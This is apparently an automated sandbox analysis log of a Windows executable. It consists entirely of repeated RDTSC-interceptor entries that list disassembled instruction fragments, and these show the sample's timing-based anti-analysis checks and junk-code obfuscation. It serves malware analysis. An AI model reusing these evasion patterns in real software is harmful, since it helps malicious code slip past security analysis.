Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16F517C second address: 16F5181 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16FEC19 second address: 16FEC1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16FE31A second address: 16FE322 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16FE322 second address: 16FE327 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16FE327 second address: 16FE32D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16FE791 second address: 16FE797 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16FE797 second address: 16FE7C1 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F3E51171E66h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c popad 0x0000000d pushad 0x0000000e jg 00007F3E51171E79h 0x00000014 jl 00007F3E51171E66h 0x0000001a jmp 00007F3E51171E6Dh 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16FE7C1 second address: 16FE7C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 16FE7C7 second address: 16FE7D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 je 00007F3E51171E66h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 17411DD second address: 17411E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 17411E1 second address: 17411E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 17414C5 second address: 17414E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E51171E76h 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 174D290 second address: 174D294 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 174D950 second address: 174D983 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F3E51171E66h 0x00000008 jmp 00007F3E51171E79h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jnp 00007F3E51171E6Ch 0x00000015 push edi 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 174DC1E second address: 174DC24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 174DC24 second address: 174DC37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F3E51171E6Dh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 174DC37 second address: 174DC4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 jmp 00007F3E511046ABh 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 174DC4F second address: 174DC54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 174DDCD second address: 174DDDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push esi 0x00000010 pop esi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 174DDDE second address: 174DDF4 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F3E51171E66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 jp 00007F3E51171E66h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 174DF8F second address: 174DFC9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 pop edi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007F3E511046B4h 0x00000016 popad 0x00000017 jmp 00007F3E511046B4h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 174CD92 second address: 174CDB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3E51171E79h 0x00000009 jnp 00007F3E51171E66h 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 174CDB6 second address: 174CDC3 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F3E511046A8h 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 174CDC3 second address: 174CDDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jc 00007F3E51171E66h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 jnp 00007F3E51171E66h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 174CDDF second address: 174CDE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 174CDE8 second address: 174CDEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 174CDEC second address: 174CDF8 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F3E511046A6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 175BB52 second address: 175BB5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 175BB5A second address: 175BB5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 175BB5F second address: 175BBAA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F3E51171E72h 0x00000008 jmp 00007F3E51171E78h 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F3E51171E79h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 175BBAA second address: 175BBAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 17663C1 second address: 17663EB instructions: 0x00000000 rdtsc 0x00000002 jl 00007F3E51171E66h 0x00000008 jmp 00007F3E51171E6Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F3E51171E72h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 1765EF0 second address: 1765F0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 jmp 00007F3E511046B3h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 176A77F second address: 176A78C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 pop edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 176A78C second address: 176A7A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3E511046B6h 0x00000009 push edi 0x0000000a pop edi 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 17777AE second address: 17777CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jp 00007F3E51171E66h 0x00000009 jmp 00007F3E51171E6Ch 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 pop eax 0x00000017 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 17777CC second address: 1777801 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E511046B0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007F3E511046C1h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 177F452 second address: 177F456 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 177F456 second address: 177F46E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a jmp 00007F3E511046AEh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 177F46E second address: 177F489 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E51171E6Ah 0x00000007 jns 00007F3E51171E66h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop ecx 0x00000010 pushad 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 177E2F1 second address: 177E2F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 177E2F7 second address: 177E302 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 177E302 second address: 177E306 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 177E306 second address: 177E30E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 177E30E second address: 177E319 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007F3E511046A6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 177E5C6 second address: 177E5D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jno 00007F3E51171E66h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 177E74E second address: 177E752 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 177E752 second address: 177E75A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 177E75A second address: 177E765 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007F3E511046A6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 177E765 second address: 177E771 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F3E51171E66h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 177F172 second address: 177F193 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 jmp 00007F3E511046B4h 0x0000000c popad 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 177F193 second address: 177F19C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 177F19C second address: 177F1CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3E511046B6h 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007F3E511046B3h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 1781FC6 second address: 1781FD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 1781FD1 second address: 1781FD7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 1781CC3 second address: 1781D0D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E51171E6Bh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F3E51171E82h 0x00000011 jmp 00007F3E51171E74h 0x00000016 push ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 1785F5B second address: 1785F61 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 1785F61 second address: 1785F65 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 17D29FA second address: 17D2A09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3E511046ABh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 17D2A09 second address: 17D2A13 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F3E51171E66h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 17D2A13 second address: 17D2A33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F3E511046AFh 0x0000000b popad 0x0000000c jg 00007F3E511046B6h 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 pop eax 0x00000016 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 17D2A33 second address: 17D2A39 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 1899172 second address: 1899179 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 1899179 second address: 18991C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F3E51171E66h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 jmp 00007F3E51171E75h 0x00000017 jnc 00007F3E51171E66h 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F3E51171E71h 0x00000025 js 00007F3E51171E66h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 18991C0 second address: 18991C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 18991C4 second address: 18991CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 18991CA second address: 18991ED instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F3E511046ACh 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pop esi 0x0000000d jmp 00007F3E511046AFh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 1897FA7 second address: 1897FAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 1897FAD second address: 1897FB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 189810F second address: 1898113 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 1898113 second address: 189811B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 1898278 second address: 18982B0 instructions: 0x00000000 rdtsc 0x00000002 je 00007F3E51171E7Ch 0x00000008 jmp 00007F3E51171E76h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F3E51171E76h 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 1898465 second address: 189848B instructions: 0x00000000 rdtsc 0x00000002 jc 00007F3E511046A8h 0x00000008 pushad 0x00000009 jmp 00007F3E511046B9h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 18985FC second address: 189860C instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F3E51171E72h 0x00000008 jnc 00007F3E51171E66h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 18988CA second address: 18988D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 18988D0 second address: 18988D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 1898A99 second address: 1898A9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 1898A9D second address: 1898AA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 189D39E second address: 189D3A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 189D5BD second address: 189D608 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pop ebx 0x0000000e nop 0x0000000f mov edx, ebx 0x00000011 push dword ptr [ebp+12A05957h] 0x00000017 push 00000000h 0x00000019 push ebp 0x0000001a call 00007F3E51171E68h 0x0000001f pop ebp 0x00000020 mov dword ptr [esp+04h], ebp 0x00000024 add dword ptr [esp+04h], 0000001Ch 0x0000002c inc ebp 0x0000002d push ebp 0x0000002e ret 0x0000002f pop ebp 0x00000030 ret 0x00000031 mov dword ptr [ebp+12A026B7h], ebx 0x00000037 push F6BE7454h 0x0000003c pushad 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 popad 0x00000041 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 189D608 second address: 189D60C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 18A03C5 second address: 18A03CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 18A03CB second address: 18A03D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 18A03D2 second address: 18A03DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 70300DF second address: 70300E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 70300E3 second address: 70300E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 70300E9 second address: 7030113 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3E511046B4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F3E511046ABh 0x0000000f xchg eax, ebx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 pop edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7030113 second address: 7030144 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F3E51171E6Eh 0x00000008 sub ch, FFFFFFE8h 0x0000000b jmp 00007F3E51171E6Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 mov ax, 93DFh 0x00000017 popad 0x00000018 mov ebx, dword ptr [eax+10h] 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e pushad 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7030144 second address: 7030149 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 7030149 second address: 703015C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3E51171E6Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\PhwUGyok2i.exe RDTSC instruction interceptor: First address: 703015C second address: 703018D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushfd 0x0000000d jmp 00007F3E511046AEh 0x00000012 jmp 00007F3E511046B5h 0x00000017 popfd 0x00000018 rdtsc
